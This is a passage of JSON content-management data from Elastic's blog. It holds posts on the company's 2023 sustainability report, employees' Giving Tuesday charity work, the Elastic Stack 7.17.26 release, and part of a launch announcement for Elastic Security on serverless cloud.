and our programs continue to unveil new opportunities.","author":["blt815deca5b5d6c2d2"],"category":["blt0c9f31df4f2a7a2b"],"created_at":"2024-06-12T13:40:49.565Z","created_by":"bltb6c155cd84fc0c1a","markdown_l10n":"","modular_blocks":[{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"cs82d4bab2d0c3ffc1"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eOur latest \u003c/span\u003e\u003ca href=\"https://www.elastic.co/pdf/elastic-sustainability-report-2023.pdf\"\u003e\u003cspan style='font-size: 12pt;'\u003eSustainability Report\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e wraps another exciting year of progress at Elastic, and our programs continue to unveil new opportunities. This past year has proven pivotal in how we work with key stakeholder groups to better understand their objectives and build toward our shared sustainability aspirations. I am energized by the increasing number of customers keen to partner with us in order to meet their own commitments, spanning a diverse range of industry sectors and geographies. Engaging on climate action and decarbonization measures has been invigorating, opening new opportunities for collaboration around shared ambition. To me, this perfectly embodies the Customer, 1st aspect of our \u003c/span\u003e\u003ca href=\"https://www.elastic.co/about/our-source-code\"\u003e\u003cspan style='font-size: 12pt;'\u003eSource Code\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e.\u003c/span\u003e\u003c/p\u003e"},{"title_l10n":"Teams across Elastic come together to advance sustainability commitments","_metadata":{"uid":"cs78851c123fab5980"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eInternally, we’ve worked closely with key teams to help operationalize programs that will play a big role in our future commitments. For example, our Workplaces team enhanced our sustainable site-selection criteria and deepened our engagement with existing office locations to make sure we have actionable data that’s needed for managing our impacts. Our Strategic Sourcing team also started implementing a supplier engagement strategy to collaborate with our most carbon-intensive vendors on carbon reduction opportunities. In support of all of these efforts, we onboarded a new data management tool that will keep our sustainability programs informed with the latest measurement advancements and optimized for the future.\u0026nbsp;\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e2023 was also a big year for the advancement of new regulatory requirements, which has accelerated going into 2024. Our Legal and Business Integrity teams continue to be invaluable partners as we navigate the significant changes to the regulatory landscape.\u003c/span\u003e\u003c/p\u003e"},{"title_l10n":"Taking the next steps on our sustainability journey","_metadata":{"uid":"csb6132bf27b313675"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eThe level of enthusiasm and expertise my fellow Elasticians bring to our work makes for a truly rewarding sustainability journey. It also means we have the support we need to dive into new opportunities in this space. I’m especially excited by our product enhancements — such as \u003c/span\u003e\u003ca href=\"https://www.elastic.co/elasticsearch/serverless\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003eElastic Cloud Serverless\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"font-size: 12pt;\"\u003e — which delivers superior performance with a more efficient and sustainable cloud infrastructure footprint thanks to the \u003c/span\u003e\u003ca href=\"/cloud/serverless/search-ai-lake\" target=\"_self\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003eSearch AI Lake architecture\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"font-size: 12pt;\"\u003e.\u0026nbsp;\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eI hope you’ll \u003c/span\u003e\u003ca href=\"https://www.elastic.co/pdf/elastic-sustainability-report-2023.pdf\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003edownload the report\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"font-size: 12pt;\"\u003e and share feedback as we look ahead!\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"csdd79f1351fa5a5ca"}}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"cs55156e440fde5886"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style=\"color: rgb(52, 55, 65);font-size: 10pt;\"\u003e\u003cem\u003eThe release and timing of any features or functionality described in this post remain at Elastic's sole discretion. Any features or functionality not currently available may not be delivered on time or at all.\u003c/em\u003e\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"cs789cdc8adec7471c"}}}],"publish_date":"2024-06-20","sanity_migration_complete":false,"seo":{"seo_title_l10n":"","seo_description_l10n":"","seo_image":null,"noindex":false,"canonical_tag":""},"subtitle_l10n":"","table_of_contents":{"blog_series":[]},"tags":[],"tags_culture":[],"tags_elastic_stack":[],"tags_industry":[],"tags_partner":[],"tags_topic":[],"tags_use_case":[],"thumbnail_image":{"uid":"blt84fe559730ccc0ac","_version":1,"is_dir":false,"ACL":{},"content_type":"image/png","created_at":"2024-06-12T13:39:09.775Z","created_by":"bltb6c155cd84fc0c1a","file_size":"154331","filename":"ESG_report_2023-720x420_(1).png","parent_uid":null,"tags":[],"title":"ESG report 2023-720x420 (1).png","updated_at":"2024-06-12T13:39:09.775Z","updated_by":"bltb6c155cd84fc0c1a","publish_details":{"time":"2024-06-20T16:00:00.350Z","user":"bltb6c155cd84fc0c1a","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt84fe559730ccc0ac/6669a4fd46a0372139a26813/ESG_report_2023-720x420_(1).png"},"title":"Sustainability is Elastic: A year of progress and new opportunities","title_l10n":"Sustainability is Elastic: A year of progress and new opportunities","updated_at":"2024-12-03T18:36:57.050Z","updated_by":"blt3044324473ef223b70bc674c","url":"/blog/sustainability-report-2023","publish_details":{"time":"2024-12-03T18:37:01.601Z","user":"blt3044324473ef223b70bc674c","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"}},{"uid":"bltc0596be152019b16","_version":3,"locale":"en-us","ACL":{},"abstract_l10n":"With Giving Tuesday fast approaching and giving season in full swing, we caught up with Elasticians around the world to find out what causes they’re most passionate about. ","author":["blt7fc3768df8cad1f6"],"category":["bltc253e0851420b088"],"created_at":"2024-11-19T06:06:21.477Z","created_by":"blte369ea3bcd6ac892","markdown_l10n":"","modular_blocks":[{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"cs350c8ec4ea089f97"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eWith Giving Tuesday fast approaching and giving season in full swing, we caught up with Elasticians around the world to find out what causes they’re most passionate about.\u0026nbsp;\u003c/span\u003e\u003c/p\u003e\u003ch2\u003eFundamental beliefs\u003c/h2\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eCarolyn Herzog, chief legal officer, gives year round to a variety of organizations. She sees donations of time and money as a civic responsibility — this was instilled in her as a child. She fundamentally believes in civil rights and human rights and making a positive impact on others.\u0026nbsp;\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003e“A lot of civic activity is about learning from others and then learning what you can do to help rather than starting with what you can do to help,” she says. “Don’t be afraid to walk in someone’s shoes or say you don’t know something. It’s made me a better listener.”\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eShe supports a variety of causes and gets her children involved, too. For their family, giving is part of the budget and having an impact is important.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003e“As I've grown up in my career and had kids and seen how the world evolves and devolves, certain issues are really important to me,” Carolyn says.\u0026nbsp;\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eCarolyn recently joined the board of directors for the \u003c/span\u003e\u003ca href=\"https://www.hfsv.org/\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003eHispanic Foundation of Silicon Valley\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"font-size: 12pt;\"\u003e, an organization that works to improve the lives and futures of Latinos in the region.\u003cbr /\u003e\u003cbr /\u003e“It was an honor to be asked,” she says. “The Hispanic Foundation of Silicon Valley does grassroots work in the community. I will always do civil rights work.”\u0026nbsp;\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eOthers causes close to her heart are women’s rights, LGBTQ+ rights, and mental health awareness.\u0026nbsp;\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eShe works with the \u003c/span\u003e\u003ca href=\"https://www.nami.org/\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003eNational Alliance on Mental Illness\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"font-size: 12pt;\"\u003e (NAMI) — an organization that provides mental health services and counseling — to destigmatize mental illness and invest in research funds. Carolyn sought out the organization for her and her family after the loss of her sister.\u0026nbsp;\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003e“We needed ways in our family to connect and cope,” she says. “It was a traumatic and devastating event and NAMI has different ways to help.”\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eCarolyn funds NAMIWalks in her community, bringing people together to share their stories and walk together.\u0026nbsp;\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eShe has instilled this intentional giving into her two children as well.\u0026nbsp;\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003e“We dedicate the eight days of Hanukkah to eight different charities,” she says. “Everyone presents why they want to give to them and what’s important to them.”\u003cbr /\u003e\u003cbr /\u003e\u003c/span\u003e\u003c/p\u003e\u003ch2\u003eCommunity focus\u003c/h2\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eEámonn O’Leary, senior site reliability engineer, donates his time and money to a local residents group and a no-kill animal sanctuary.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eHis local community, Killen, is in a rural area in Northern Ireland, so the residents group puts on events, advocates for the town, and helps locals. For example, the town previously had subpar mobile phone signal and potholes on main roads preventing people from reaching the hospital. The group works with the local government to rectify those issues and support all community members — both young and old.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eEámonn volunteers his time but also regularly donates to the group, especially around Giving Tuesday when Elastic matches donations 2:1. The group relies on donations and the odd grant, Eámonn says. The donation-matching makes a huge difference.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003e“It’s a huge bump for the organization, and it’s not breaking my bank,” he says.\u0026nbsp;\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eDonation funding is used so that the group can put on free family activities like summer barbeques and holiday events. Last year during Christmas time, the Killen residents group hired a Santa with elves and a sled and visited local kids, allowing them to choose a gift and a book.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003e“It was totally free of charge, and it ensures everyone is treated the same way,” Eámonn says.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style=\"color: rgb(52, 55, 65);font-size: 8pt;\"\u003e\u003cem\u003e\u003c/em\u003e\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"cs911703e54f68c480"}}},{"image":{"image":{"uid":"blt075d7975869cf295","_version":1,"is_dir":false,"ACL":{},"content_type":"image/jpeg","created_at":"2024-11-19T06:05:08.464Z","created_by":"blte369ea3bcd6ac892","file_size":"125569","filename":"347393086_295158062907010_3014615970930564150_n.jpg","parent_uid":null,"tags":[],"title":"347393086_295158062907010_3014615970930564150_n.jpg","updated_at":"2024-11-19T06:05:08.464Z","updated_by":"blte369ea3bcd6ac892","publish_details":{"time":"2024-11-19T15:00:00.472Z","user":"blte369ea3bcd6ac892","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt075d7975869cf295/673c2a9419d0a86189f24870/347393086_295158062907010_3014615970930564150_n.jpg"},"_metadata":{"uid":"cs6dbd3f2ae2cd96c5"},"caption_l10n":"","alt_text_l10n":"","disable_lightbox":false,"remove_shadow":false,"sizing":{"sizing_options":null}}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"cs68fbb2cc5ef4e4e5"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003c/p\u003e\u003ch2\u003eElastic cares\u003c/h2\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eElastic empowers its Elasticians to support the causes that matter to them and their communities. In 2023, Elastic and Elasticians invested over $1.3 million in 1,300 causes around the world.\u0026nbsp;\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eThis was made possible through the Elastic Cares donation matching program, which matches employees’ donations to the causes they feel passionate about. It’s a benefit that Elastic is proud to offer its employees — each fiscal year, every Elastician has access to US$2,000 or the local equivalent in charitable matching.\u0026nbsp;\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eLocal offices also organize volunteer events and giving opportunities throughout the season. Shandy Yap, workplace coordinator in Elastic’s Singapore office, plans volunteer events for the office with local nonprofits.\u0026nbsp;\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003e“Last year, we did a gift of joy where we invited Elasticians to adopt wishes for others,” Shandy says. “All the wishes are adopted really quickly — people want more.”\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eEarlier this year, Shandy organized the #LoveOurSeniors initiative in partnership with CapitaLand Hope Foundation. As part of this effort, Elasticians visited seniors across Singapore to deliver loaves of bread and check on their well-being.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eThis holiday season, Shandy is planning a handicraft workshop with \u003c/span\u003e\u003ca href=\"https://brightonconnection.org.sg/bn_services/senior-outreach/\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003eBrighton Connection\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"font-size: 12pt;\"\u003e where participants will craft a bear as a heartfelt gift for loved ones. These events are a platform to create awareness about giving back, Shandy says.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003e“Everyone wants to do it. This is just a way to remind people who are busy,” she says. “Having the opportunity to double the giving makes it even more meaningful.”\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e"}],"_metadata":{"uid":"cs8a9fc8aa1a6cee0c"}}},{"image":{"image":{"uid":"blt574b895f142a2b37","_version":1,"is_dir":false,"ACL":{},"content_type":"image/jpeg","created_at":"2024-11-19T06:05:49.571Z","created_by":"blte369ea3bcd6ac892","file_size":"2301948","filename":"Beach_Cleanup_With_Metta_Association.jpg","parent_uid":null,"tags":[],"title":"Beach Cleanup With Metta Association.jpg","updated_at":"2024-11-19T06:05:49.571Z","updated_by":"blte369ea3bcd6ac892","publish_details":{"time":"2024-11-19T15:00:00.497Z","user":"blte369ea3bcd6ac892","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt574b895f142a2b37/673c2abd547e54120c1ec63a/Beach_Cleanup_With_Metta_Association.jpg"},"_metadata":{"uid":"csbd994d6aca47b7b5"},"caption_l10n":"","alt_text_l10n":"","disable_lightbox":false,"remove_shadow":false,"sizing":{"sizing_options":null}}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"cs71d9c3fccb19b32f"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cem\u003e\u003cstrong\u003eWork for a company that supports you in supporting the causes you care about. \u003c/strong\u003e\u003c/em\u003e\u003c/span\u003e\u003ca href=\"https://www.elastic.co/careers/?baymax=web\u0026elektra=culture-giving-tuesday\"\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eBrowse open roles\u003c/strong\u003e\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cem\u003e\u003cstrong\u003e.\u0026nbsp;\u003cbr /\u003e\u003cbr /\u003e\u003c/strong\u003e\u003c/em\u003e\u003c/span\u003e\u003cspan style='color:rgb(52, 55, 65);font-size: 8pt;'\u003e\u003cem\u003eElastic, Elasticsearch and associated marks are trademarks, logos or registered trademarks of Elasticsearch N.V. in the United States and other countries. All other company and product names are trademarks, logos or registered trademarks of their respective owners.\u003c/em\u003e\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"csf5a5562c1004c8ad"}}}],"publish_date":"2024-11-19","sanity_migration_complete":false,"seo":{"seo_title_l10n":"","seo_description_l10n":"","seo_image":null,"noindex":false,"canonical_tag":""},"subtitle_l10n":"","table_of_contents":{"blog_series":[]},"tags":[],"tags_culture":[{"uid":"blt791379bc935f6af0","_content_type_uid":"tags_culture"}],"tags_elastic_stack":[],"tags_industry":[],"tags_partner":[],"tags_topic":[],"tags_use_case":[],"thumbnail_image":{"uid":"blt33e3d511bce77c11","_version":1,"is_dir":false,"ACL":{},"content_type":"image/png","created_at":"2024-11-19T05:53:15.759Z","created_by":"blte369ea3bcd6ac892","file_size":"93317","filename":"166803-givingtuesdayblog_166803-givingtuesdayblog-720x420-OPT3-1.png","parent_uid":null,"tags":[],"title":"166803-givingtuesdayblog_166803-givingtuesdayblog-720x420-OPT3-1.png","updated_at":"2024-11-19T05:53:15.759Z","updated_by":"blte369ea3bcd6ac892","publish_details":{"time":"2024-11-19T15:00:00.485Z","user":"blte369ea3bcd6ac892","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt33e3d511bce77c11/673c27cb6e6b7c3f7d0ff6ef/166803-givingtuesdayblog_166803-givingtuesdayblog-720x420-OPT3-1.png"},"title":"Giving back: Elasticians choose causes they care about","title_l10n":"Giving back: Elasticians choose causes they care about","updated_at":"2024-12-03T17:06:49.242Z","updated_by":"blte369ea3bcd6ac892","url":"/blog/culture-giving-tuesday","publish_details":{"time":"2024-12-03T17:07:16.643Z","user":"blte369ea3bcd6ac892","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"}},{"uid":"blt521d5dd551044629","_version":2,"locale":"en-us","ACL":{},"abstract_l10n":"Read about the updates and bug fixes that have been included in this release.","author":["bltbf6fc4da34fe35bb"],"category":["bltfaae4466058cc7d6"],"created_at":"2024-12-02T18:34:57.187Z","created_by":"bltb6c155cd84fc0c1a","markdown_l10n":"Version 7.17.26 of the Elastic Stack was released today. We recommend you [upgrade to this latest version](https://www.elastic.co/downloads). We recommend 7.17.26 over the previous versions 7.17.25\n\nFor details of the issues that have been fixed and a full list of changes for each product in this version, please refer to [the release notes](https://www.elastic.co/guide/en/starting-with-the-elasticsearch-platform-and-its-solutions/7.17/new.html).\n","modular_blocks":[],"publish_date":"2024-12-03","sanity_migration_complete":false,"seo":{"seo_title_l10n":"","seo_description_l10n":"","seo_image":null,"noindex":false,"canonical_tag":""},"subtitle_l10n":"","table_of_contents":{"blog_series":[]},"tags":[],"tags_culture":[],"tags_elastic_stack":[],"tags_industry":[],"tags_partner":[],"tags_topic":[],"tags_use_case":[],"thumbnail_image":{"uid":"blt8836a5dda86cbfe0","_version":1,"created_by":"bltb6c155cd84fc0c1a","updated_by":"bltb6c155cd84fc0c1a","created_at":"2024-04-01T15:42:09.734Z","updated_at":"2024-04-01T15:42:09.734Z","content_type":"image/png","file_size":"62454","filename":"Patch_release_dark.png","title":"Patch_release_dark.png","ACL":{},"parent_uid":null,"is_dir":false,"tags":[],"publish_details":{"time":"2024-04-02T17:14:25.081Z","user":"bltb6c155cd84fc0c1a","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt8836a5dda86cbfe0/660ad5d11b5a5878c8adccbc/Patch_release_dark.png"},"title":"Elastic Stack 7.17.26 released","title_l10n":"Elastic Stack 7.17.26 released ","updated_at":"2024-12-03T14:00:19.048Z","updated_by":"bltb6c155cd84fc0c1a","url":"/blog/elastic-stack-7-17-26-released","publish_details":{"time":"2024-12-03T14:00:25.824Z","user":"bltb6c155cd84fc0c1a","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"}},{"uid":"blt0ebb18ffbe285916","_version":3,"locale":"en-us","ACL":{},"abstract_l10n":"Elastic Security on Elastic Cloud Serverless is now generally available. You can launch a deployment in minutes — no experience required. Serverless is fully managed, minimizing TCO and providing fast access to the power of Elastic Security.","author":["blt91eeaf08ab3d1d6a","blt7dde00d83506ea02"],"category":["bltfaae4466058cc7d6"],"created_at":"2024-11-26T18:27:03.212Z","created_by":"bltb6c155cd84fc0c1a","markdown_l10n":"","modular_blocks":[{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"cs0ba9f961b02b1e6e"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eElastic Security on Elastic Cloud Serverless is now generally available. You can launch a deployment in minutes — no prior experience required. Serverless projects are fully managed, minimizing total cost of ownership (TCO) and providing immediate access to the powerful features of the Elastic Search AI Platform and \u003c/span\u003e\u003ca href=\"https://www.elastic.co/security\"\u003e\u003cspan style='font-size: 12pt;'\u003eElastic Security\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e.\u003c/span\u003e\u003c/p\u003e"},{"title_l10n":"Get started now","_metadata":{"uid":"cs4424c006cb9f3488"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eElastic Security on Elastic Cloud Serverless empowers security teams to get up and running quickly, complementing existing options for on-premises, hybrid cloud, and multi-cloud infrastructures. This unmatched versatility ensures that your strategy can adapt with evolving business needs.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eThe solution is engineered for \u003c/span\u003e\u003ca href=\"https://www.elastic.co/security/siem\"\u003e\u003cspan style='font-size: 12pt;'\u003eSIEM\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e, \u003c/span\u003e\u003ca href=\"https://www.elastic.co/security/endpoint-security\"\u003e\u003cspan style='font-size: 12pt;'\u003eendpoint security\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e, and \u003c/span\u003e\u003ca href=\"https://www.elastic.co/security/cloud-security\"\u003e\u003cspan style='font-size: 12pt;'\u003ecloud security\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e use cases. You can operationalize these capabilities right away, which is especially valuable for organizations \u003c/span\u003e\u003ca href=\"https://www.elastic.co/security/siem-replacement\"\u003e\u003cspan style='font-size: 12pt;'\u003ereplacing a legacy SIEM\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e like Splunk or QRadar.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eServerless elevates practitioners with guided onboarding to ramp up swiftly and with a focused UI for core SecOps workflows. To further accelerate investigation and response, Elastic AI Assistant for Security provides analysts with valuable guidance, insights, and context.\u003c/span\u003e\u003c/p\u003e"},{"title_l10n":"Reduce TCO with a fully managed solution","_metadata":{"uid":"cs2d47970de441c483"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eElastic Cloud Serverless reduces total cost of ownership by delivering Elastic Security as a fully managed solution that dynamically scales to meet the needs of security teams.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eThe offering eliminates the operational overhead of managing infrastructure for security software. Practitioners can focus on their mission while Elastic handles administrative tasks like provisioning, scaling, monitoring, and upgrades.\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"csdaab07d5d996f345"}}},{"quotes":{"quote_l10n":"I'd advise companies with on-premises or hosted cloud Elastic deployments to use serverless, so they can streamline administration and focus on what's important.","_metadata":{"uid":"csce2267a2e7ab20be"},"quote_author_l10n":"InfoSec leader and former technical consultant","quote_details_l10n":""}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"csabeb3eab18fcb6aa"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eElastic Security scales efficiently and automatically on Elastic Cloud Serverless. There is no need for capacity planning or performance monitoring because the solution independently scales storage and compute (both up and down) to meet fluctuating demands.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003ePerformance is paramount for security teams. When tested with 3,000+ concurrent queries on 5 TB of data, the solution consistently delivered response times in the low milliseconds. In a recent survey of serverless technical preview participants, 100% of respondents rated the offering either \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cem\u003eGood\u003c/em\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e or \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cem\u003eGreat\u003c/em\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e for both operational stability and overall performance.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eWith \u003c/span\u003e\u003ca href=\"https://www.elastic.co/pricing/serverless-security\"\u003e\u003cspan style='font-size: 12pt;'\u003eeasy and transparent pricing\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e, customers pay only for what they use. Charges are based on the volume of data ingested and retained. Optional add-ons for endpoint and cloud protection enable customers to strengthen security further.\u003c/span\u003e\u003c/p\u003e"},{"title_l10n":"Powered by the Elastic Search AI Lake","_metadata":{"uid":"cs20016afb19d4d61d"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eElastic Cloud Serverless delivers AI-driven security analytics using the efficient and performant Elastic Search AI Lake. With a new cloud-native architecture optimized for both short- and long-term retention, you can analyze data from across your holistic attack surface — even from years of archives. The solution further reduces storage costs by minimizing data duplication and applying advanced compression techniques and codecs,\u0026nbsp;making it ideal for enterprise-wide security operations. We’ve validated performance at petabyte scale and are enhancing scalability further in future releases.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eServerless is engineered for organizations that need Elastic Security’s innovative features and optimized for centralized security operations center (SOC) teams deploying in the cloud. The offering is available on AWS (in four regions and counting) with support for additional cloud providers on the horizon.\u003c/span\u003e\u003c/p\u003e"},{"title_l10n":"Accelerate SecOps with cutting-edge capabilities","_metadata":{"uid":"cs77a941191ce06b3b"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eThe following Elastic Security features equip practitioners to address challenges faster:\u003c/span\u003e\u003c/p\u003e\u003cul\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eCollect and normalize popular data sources with prebuilt integrations and further broaden visibility by creating custom integrations with \u003c/span\u003e\u003ca href=\"https://www.elastic.co/blog/automatic-import-ai-data-integration-builder\"\u003e\u003cspan style='font-size: 12pt;'\u003eAutomatic Import\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e.\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eVisualize data on prebuilt and custom dashboards and quickly query the \u003c/span\u003e\u003ca href=\"https://www.elastic.co/blog/search-ai-lake-elastic-cloud-serverless\"\u003e\u003cspan style='font-size: 12pt;'\u003eSearch AI Lake\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e.\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eActivate field-tested machine learning (ML) jobs and detection rules based on MITRE ATT\u0026amp;CK® coverage and create new ones with Elastic AI Assistant for Security.\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eTriage a flood of alerts down to the few attacks that matter with our \u003c/span\u003e\u003ca href=\"https://www.elastic.co/guide/en/security/current/attack-discovery.html\"\u003e\u003cspan style='font-size: 12pt;'\u003eAttack Discovery\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e feature and uncover unknown threats with advanced analytics.\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eElevate analysts with an intuitive UI and context-aware AI guidance.\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003c/ul\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eThe AI capabilities of Elastic Security on Elastic Cloud Serverless are made possible by the Elastic Search AI Platform. Customers can choose from a 